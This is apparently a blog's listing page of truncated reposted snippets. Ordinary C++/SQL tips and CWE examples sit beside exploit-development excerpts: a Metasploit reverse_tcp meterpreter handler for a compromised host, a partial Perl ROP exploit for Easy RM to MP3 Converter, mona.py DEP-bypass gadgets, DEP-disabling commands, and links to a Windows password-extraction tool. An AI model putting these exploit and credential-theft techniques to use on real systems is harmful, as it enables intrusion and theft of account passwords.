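[Repost] web.config encryption and decryption method
1. Open the code with .NET Reflector. 2. Wherever SQL is executed, find the statement that connects to the database, e.g. DBData.GetDataDBCommand(); 3. Step into DBData.GetDataDBCommand(); and you will see DBCommand(xx.DataDBType, xx.DataDBConnString); 4. xx.DataDBConnString is the decrypted content.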
2016-05-15 01:22:44
559
1
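[Repost] Searching a database for a column name
-- Placeholders: 指定数据库 = the target database; 此处为列名 = the column name to search for
use 指定数据库;
select sysobjects.name as tablename, syscolumns.name as columnname
from syscolumns join sysobjects on sysobjects.id = syscolumns.id
where syscolumns.name like '%此处为列名%'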
2016-05-01 10:35:27
593
[Repost] Uploading a file via FTP
================ Save as ftp.txt ========
open ip
root
pass
put c:\downloads\xx.rar
bye
========================
Then run from cmd:
ftp -i -s:c:\downloads\ftp.txt
2016-04-30 14:56:36
390
[Repost] RWMC: a powerful tool for extracting Windows account passwords with PowerShell
http://www.freebuf.com/tools/94559.html
https://github.com/giMini/RWMC/tree/master/Reveal-MemoryCredentials
2016-01-27 23:12:46
1113
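[Repost] ChiNext VOL-MY 10 o'clock study
Successful cases: Date, UpVsDown, Market UpVsDown (excluding the open), Market UpVsDown (including the open), Market below -1%, Did B surge yesterday, Market gap (yesterday), 10:00 index gain relative to the open. 2015.12.3 2.74 (1.74)1.111.11 No No -1.1(1.7)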
2015-12-23 12:40:52
454
[Repost] rp++ find ROP sequences
https://github.com/0vercl0k/rp rp++ is a full-cpp written tool that aims to find ROP sequences in PE/Elf/Mach-O x86/x64 binaries. It is open-source and has been tested on several OS: Debian / Win
2015-12-20 11:22:38
547
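[Repost] Using the VC++ ListBox (list box)
ListBox operations are fairly simple. 1. Adding data: declare the control variable with category Control, variable type CListBox and variable name m_ListBox_Content. m_ListBox_Content.AddString(_T("123")); m_ListBox_Content.AddString(_T("汉字")); m_ListBox_Content.AddString(_T("English")); m_L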
2015-07-12 11:28:56
6872
[Repost] A detailed explanation of STL string
http://blog.chinaunix.net/uid-20357359-id-1963246.html c_str: obtains a C-style const char* string. list::iterator Iterator; Iterator=Player.begin(); printf("Player %s\n",Iterator
2015-07-04 11:43:14
486
[Repost] error C2065: “list”: 未声明的标识符 (undeclared identifier)
http://blog.youkuaiyun.com/friendan/article/details/9033577 Add using namespace std;
2015-07-04 10:51:17
5639
1
[Repost] CWE-469: Use of Pointer Subtraction to Determine Size
http://cwe.mitre.org/data/definitions/469.html Example 1: The following example contains the method size that is used to determine the number of nodes in a linked list. The method is passed
2015-06-26 20:50:22
485
[Repost] CWE-134: Uncontrolled Format String
http://cwe.mitre.org/data/definitions/134.html Example 2: The following code copies a command line argument into a buffer using snprintf(). (Bad Code) Example Language: C int main(in
2015-06-25 21:57:49
842
[Repost] CWE-234: Failure to Handle Missing Parameter
http://cwe.mitre.org/data/definitions/234.html Example 1 (Bad Code) Example Languages: C and C++ foo_funct(one, two); ... void foo_funct(int one, int two, int three) {p
2015-06-25 20:41:16
397
[Repost] CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
cwe.mitre.org/data/definitions/362.html Example 2: The following function attempts to acquire a lock in order to perform operations on a shared resource. (Bad Code) Example Language: C
2015-06-25 20:15:31
904
[Repost] CWE-908: Use of Uninitialized Resource
http://cwe.mitre.org/data/definitions/908.html The following code intends to concatenate a string to a variable and print the string. (Bad Code) Example Language: C char str[20];st
2015-06-25 14:10:27
449
[Repost] CWE-681: Incorrect Conversion between Numeric Types
http://cwe.mitre.org/data/definitions/681.html The function's return type does not match the declared type, so the returned value undergoes a hidden conversion! In this example, depending on the return value of accessmainframe(), the variable amount can hold a negative value when
2015-06-24 20:45:34
461
[Repost] Exporting content to a file
int LogToFile(char* pFilePath, WORD* pBuffer){ int nRetCode = 0; FILE* pFile; pFile = fopen(pFilePath, "a+"); if (NULL == pFile) { printf("Fail to open file!\n");
2015-05-30 20:54:41
371
[Repost] ReadProcessMemory and WriteProcessMemory usage analysis (repost)
http://blog.youkuaiyun.com/shifters/article/details/6750353
2015-05-30 15:15:23
603
[Repost] Connecting stage shellcode back to meterpreter
1. Run the stage1 shellcode on the compromised host. 2. Run the Metasploit Framework on Kali. 3. Execute the following commands:
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/revers
2015-05-12 23:17:09
754
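[Repost] Practical Wireshark filter expressions (by IP, protocol, port, length and content)
First, a few of the most commonly used keywords: "eq" and "==" are equivalent; "and" means logical AND and "or" means logical OR. "!" and "not" both mean negation. I. The most common Wireshark filters are, naturally, those on IP addresses. There are several cases: (1) Filtering for packets whose source address is 192.168.0.1, i.e. capturing packets whose source address matches. The expression is: ip.src == 192.168.0.1 (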
2015-05-11 21:45:09
398
[Repost] Writing an Immunity Debugger plugin
__VERSION__ = '2.0'
__REV__ = filter(str.isdigit, '$Revision: 557 $')
__IMM__ = '1.8'
__DEBUGGERAPP__ = ''
arch = 32
win7mode = False
# try:
#     import debugger
# except:
#     pass
try:
2015-05-05 22:24:02
977
[Repost] Tutorial on writing Immunity Debugger plugins
https://www.corelan.be/index.php/2010/01/26/starting-to-write-immunity-debugger-pycommands-my-cheatsheet/
2015-05-04 21:43:42
2061
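[Repost] Array out-of-bounds overflow exploitation 2 -- modifying the length field of a preceding string to a larger value
http://bbs.pediy.com/archive/index.php?t-155555.html Using this array out-of-bounds vulnerability, the length field of a string located before the option cache is changed to a larger value, so that the string can read all the data that follows it, because the length is no longer limited. With this capability, the exact location of the string in virtual address space is first worked out. Using that exact location and the arbitrary memory read capability, the base address of the option array is obtained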
2015-05-03 23:05:51
468
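[Repost] How to use rop_gadgets
It can be generated with mona.py: !mona rop -m msvcr71.dll -n This set of gadgets turns the shellcode that follows into an executable code segment; just append the shellcode directly after it. rop_gadgets = [ 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) 0x7c37a140, # Make EAX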
2015-05-02 15:11:19
2035
[Repost] Universal DEP/ASLR bypass with msvcr71.dll and mona.py
Reposted from: https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ Introduction: Over the last few weeks, there has been some commotion about a universal
2015-05-01 22:51:49
651
[Repost] bypass dep egg hunter
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
#-------------------------------------------------------------------
#corelanc0
2015-05-01 21:30:40
742
[Repost] ROP DEP-bypass exploit for Easy RM to MP3 Converter, adapted for Chinese-language versions
#------------------------------------------------------------
#ROP based exploit for Easy RM to MP3 Converter
#written by corelanc0d3r - http://www.corelan.be
#-------------------------------------
2015-05-01 16:46:45
932
[Repost] ROP test code for Easy RM to Mp3 Converter
my $file="rop.m3u";
my $buffersize=26094-20-8-4;
my $junk="A"x$buffersize;
my $eip=pack('V',0x100102DC);#pointer to ret
my $junk2="AAAA";#compensate,to make sure esp points at first rop gadget
my
2015-05-01 10:14:43
450
[Repost] Changing DEP from the command line
bcdedit.exe /set nx OptIn
bcdedit.exe /set nx OptOut
bcdedit.exe /set nx AlwaysOn
bcdedit.exe /set nx AlwaysOff
2015-04-28 22:47:46
794
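[Repost] How to check whether a program supports ASLR
Open the file with the tool PE Explorer and check whether DllCharacteristics includes 0x40 to find out whether ASLR is supported.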
2015-04-28 21:59:18
1326
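[Repost] What the enter and leave assembly instructions do; this is useful for understanding UAC
The enter instruction does the following:
push ebp
mov ebp,esp
sub esp,xxx
The leave instruction does the following:
add esp,xxx
pop ebp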
2015-04-26 09:50:13
524